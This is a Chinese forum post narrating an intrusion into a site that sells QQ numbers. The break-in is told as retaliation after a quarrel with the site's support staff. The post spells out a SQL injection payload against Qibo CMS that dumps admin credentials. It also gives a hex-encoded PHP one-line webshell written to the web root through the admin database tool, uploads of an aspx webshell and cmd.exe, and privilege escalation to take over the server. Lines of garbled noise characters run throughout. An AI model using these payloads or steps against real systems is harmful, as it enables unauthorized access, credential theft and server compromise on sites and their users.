|
3 M4 d6 T2 a7 q5 `& T# p
. P6 e$ v# u2 j) W2 K$ V' b
9 k/ S; Q# |# s6 X3 I
7 j8 B9 S) B' ?5 y 一、踩点寻找漏洞
: ^1 Y) \8 C' {/ w8 Q闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
; o7 m! \# d4 p3 P9 E
随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
# Y& U3 K0 l; }8 ]: {7 M6 x先注册一个用户,记住注册时候的邮箱以uid号,
$ z3 Q2 b7 b1 G/ H
% e8 `; L6 U( r( e- E' {. q
G' Y! o, f7 E, V( n然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
2 T5 E: k3 M7 l& g9 M& L" O& d
* k4 s" i6 k2 n K! S: b
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
! V b+ s* j9 ^. x" ^+ J8 P
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
4 k" C# e3 E! ]
5 A4 D) F+ N- ~( H, L: {7 q* m
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
0 G4 m) s3 z% O" i `! B4 L8 i
$ E2 ]2 [( _+ q2 }, R7 f
0 ~& l) b, O. N" K7 @# [4 {/ z* b, U
解密进后台如图:
" m1 w) v' m' Q; c5 ]8 V
4 R0 p8 j: G/ A
( C7 k: k6 N, i
, N, w1 f( j8 d
二、后台getwebshell
& `9 H- F) ^' {9 r; L' W. y
进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
0 F- M1 Q+ o! f, I1 j* c! ?
7 S6 P' }$ |8 A: b5 Z
5 B! w. ^0 A' j! g3 O& [+ h2 N
9 n" _. j& ]1 k然后点确定,添加提示
" r; _9 r9 O4 n) l8 b: K5 A
h8 k0 O" X+ i" `) e7 b# I& L
6 {" r/ Z% v% B8 ?, U3 b
' @& M, C, r( O/ s- ]由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
* P, n2 E6 {' P8 Z0 S' h
. M4 V( ~0 i% O& B3 y: X- z
@- k: S* O: F" x
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
. B7 R ]/ j9 N! u如图:
8 E9 Y) }' x% y% O- y
6 v0 J" Q- ]$ r: o0 p: M. k& }
# g$ Q/ {4 v3 Q! P4 k
* D$ @2 X$ S; _: n1 K
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
, T* Y( \" }( O8 a; p4 P# N
' m# Y2 K" }6 L3 |( t6 c, X# ?! R
) j0 I* I( ~, y" {8 @' \& F) I1 o5 J
0 D* s, r' m x
三、提权进服务器
* q1 l# N; U3 Z$ h% H, q经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
: h) Q7 |. [7 X9 U& }) c
( |- Y. C7 U8 l2 L% {2 V
8 W% ]( @. q0 h6 S8 t# o) h5 k& m
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
" T/ V q7 q3 P: B# X) T
) E' c! a9 j$ |
4 K, C' J4 x ^7 x. L然后登陆服务器如图:
& ? o( {, f: A2 O; }" w; r
, R$ {+ l( t4 W2 k4 V8 m& U
3 P6 E4 x( Y! w" E. e
4 L/ l6 ~( f* l5 ~$ R, S3 o u" b7 c2 f5 T# W( l
* o2 C+ G( r5 N4 A难怪普通刀连接不上,原来是有狗。
) Q8 w; I* |8 M6 G/ |" h' m6 U
6 O+ x4 G0 s: p
. l1 v" f! ^' @ i3 }' p T " _8 _- g W% z% V0 L
/ U; E, f; r6 Q+ {
- H! _; [& u2 T& r+ {$ p
- L# z& v. ^: c/ P | 
发表于 2018-10-20 20:08:47
收藏
支持
反对